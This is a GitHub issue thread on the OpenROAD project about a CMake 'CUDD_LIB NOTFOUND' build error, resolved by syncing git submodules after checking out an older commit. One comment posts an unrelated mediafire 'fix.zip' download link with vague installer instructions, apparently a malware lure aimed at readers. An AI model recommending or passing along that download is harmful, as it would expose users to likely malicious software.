The-OpenROAD-Project/OpenROAD #5645: CMake Error CUDD_LIB NOTFOUND

fawqati-spherical, 2024-08-25:
### Describe the bug

When installing openroad from source, i get the error below when executing:
> cmake ..

CMake Error: The following variables are used in this project, but they are set to NOTFOUND.
Please set them or make sure they are set and tested correctly in the CMake files:
CUDD_LIB
    linked by target "OpenSTA" in directory /tools/downloads/OpenROAD/src/sta

-- Generating done (0.2s)
CMake Generate step failed.  Build files cannot be regenerated correctly.

Ps. I managed to get run the install dependancies script fine. 
 

### Expected Behavior

install without errors

### Environment

```shell
[WARNING] Your current OpenROAD version is outdated.
It is recommened to pull the latest changes.
If problem persists, file a github issue with the re-producible test case.
kernel: Linux 4.18.0-477.27.1.el8_8.x86_64
os: Rocky Linux 8.10 (Green Obsidian)
cmake version 3.26.5
-- The CXX compiler identification is GNU 8.5.0
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Check for working CXX compiler: /bin/c++ - skipped
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- OpenROAD version: v2.0-13269-g2c2f9599a
-- System name: Linux
-- Compiler: GNU 8.5.0
-- Build type: RELEASE
-- Install prefix: /usr/local
-- C++ Standard: 17
-- C++ Standard Required: ON
-- C++ Extensions: OFF
-- The C compiler identification is GNU 8.5.0
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Check for working C compiler: /bin/cc - skipped
-- Detecting C compile features
-- Detecting C compile features - done
-- Found Python: /bin/python3.11 (found version "3.11.9") found components: Interpreter 
-- Performing Test CMAKE_HAVE_LIBC_PTHREAD
-- Performing Test CMAKE_HAVE_LIBC_PTHREAD - Failed
-- Looking for pthread_create in pthreads
-- Looking for pthread_create in pthreads - not found
-- Looking for pthread_create in pthread
-- Looking for pthread_create in pthread - found
-- Found Threads: TRUE  
-- Performing Test C_COMPILER_SUPPORTS__-Wall
-- Performing Test C_COMPILER_SUPPORTS__-Wall - Success
-- Performing Test CXX_COMPILER_SUPPORTS__-Wall
-- Performing Test CXX_COMPILER_SUPPORTS__-Wall - Success
-- Performing Test C_COMPILER_SUPPORTS__-Wno-array-bounds
-- Performing Test C_COMPILER_SUPPORTS__-Wno-array-bounds - Success
-- Performing Test CXX_COMPILER_SUPPORTS__-Wno-array-bounds
-- Performing Test CXX_COMPILER_SUPPORTS__-Wno-array-bounds - Success
-- Performing Test C_COMPILER_SUPPORTS__-Wno-nonnull
-- Performing Test C_COMPILER_SUPPORTS__-Wno-nonnull - Success
-- Performing Test CXX_COMPILER_SUPPORTS__-Wno-nonnull
-- Performing Test CXX_COMPILER_SUPPORTS__-Wno-nonnull - Success
-- Performing Test C_COMPILER_SUPPORTS__-Wno-maybe-uninitialized
[... 108 lines cut ...]
CMake Error: The following variables are used in this project, but they are set to NOTFOUND.
Please set them or make sure they are set and tested correctly in the CMake files:
CUDD_LIB
    linked by target "OpenSTA" in directory /tools/downloads/OpenROAD/src/sta

CMake Generate step failed.  Build files cannot be regenerated correctly.
itable version "1.80.0", minimum required is "1.78")  
-- TCL library: /usr/lib64/libtcl.so
-- TCL header: /usr/include/tcl.h
-- Found Boost: /usr/local/lib/cmake/Boost-1.80.0/BoostConfig.cmake (found version "1.80.0") found components: serialization system thread 
-- Found Boost: /usr/local/lib/cmake/Boost-1.80.0/BoostConfig.cmake (found version "1.80.0")  
-- Found Eigen3: /usr/local/share/eigen3/cmake/Eigen3Config.cmake (found version "3.4.1") 
-- TCL readline enabled
-- Tcl Extended disabled
-- Python3 enabled
-- Configuring done (2.8s)
-- Generating done (0.2s)
```

### To Reproduce

git clone --recursive https://github.com/The-OpenROAD-Project/OpenROAD.git 
cd OpenROAD
git checkout 2c2f9599amkdir build && cd build
cmake ..

maliberty, 2024-08-25:
You need to run the dependency installer.

fawqati-spherical, 2024-08-25:
Good morning Matt,

As mention in my post, i managed to run the dependency installer with a few tweaks to get it running on Rocky 8.11

Can you please point me specifically to which dependancy is required ?

diablo00001, 2024-08-25:
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

maliberty, 2024-08-25:
CUDD

fawqati-spherical, 2024-08-28:
> CUDD

Hi matt, 

I just realised why i couldn't find the CUDD section in the dependancy installer. The reason is when i clone the repo, i check out a previous version of OR (due to the compatibility issues we were facing with python + openlane + yosys), and the dependancy installer has obviously been updated since that commit with the CUDD requirement, and therefore obviously not installing. 

This leads to the bigger question, regarding tagging and stable releases of OpenRoad. Is that on your roadmap ?  Anything i can help with /contribute to ? 

FYI, By reverting to a previous commit of OpenRoad but not the submodules of 'module/OpenSTA' and 'src/abc' i ended up compiling without the required dependancies. Now i assume i have to find the submodule commits that relate to the OpenRoad commit which didnt need these updated dependancies. Your invaluable feedback / input would be greatly appreciated !

Best,
Faisal

maliberty, 2024-08-28:
`git submodule update --recursive` should get the right commit.

There is no plan for formal releases as we don't have the bandwidth to patch older releases.  We only provide support at head.  Of course you are free to use any commit you wish.

fawqati-spherical, 2024-09-06:
Thanks Matt. That really helped point me in the right direction !

For anyones reference:

**My mistake was recursively cloning the repo, then checking out the commit version.**

```
> git clone --recursive https://github.com/The-OpenROAD-Project/OpenROAD.git
> git checkout 2c2f9599a
```

**The correct method is:**
> git clone https://github.com/The-OpenROAD-Project/OpenROAD.git
> git checkout 2c2f9599a
> git submodule update --init --recursive

closed 2024-09-06 by maliberty

nachiket, 2025-03-07:
I'm getting the same cmake error on the latest commit. I've followed all steps from https://openroad-flow-scripts.readthedocs.io/en/latest/user/BuildLocally.html

This is the exact sequence of steps..
```
git clone --recursive https://github.com/The-OpenROAD-Project/OpenROAD.git
cd OpenROAD
sudo ./etc/DependencyInstaller.sh -base
./etc/DependencyInstaller.sh -common -local
./etc/Build.sh
```

I see this in the cmake log
```
-- TCL readline enabled
-- Tcl Extended disabled
-- Python3 enabled
-- Configuring done (2.9s)
CMake Error: The following variables are used in this project, but they are set to NOTFOUND.
Please set them or make sure they are set and tested correctly in the CMake files:
CUDD_LIB
    linked by target "OpenSTA" in directory /zfsspare/opt/OpenROAD/src/sta

-- Generating done (0.9s)
```

nachiket, 2025-03-07:
Ok so I think a broken apt package path in sources.list.d was messing the build script. I fixed that and with the -all option it worked. I still can't get -local to work correctly. I think the docs page should say `cd build; sudo make install` to be clear about the exact set of steps. But overall it's quite well-documented. Looking forward to using it.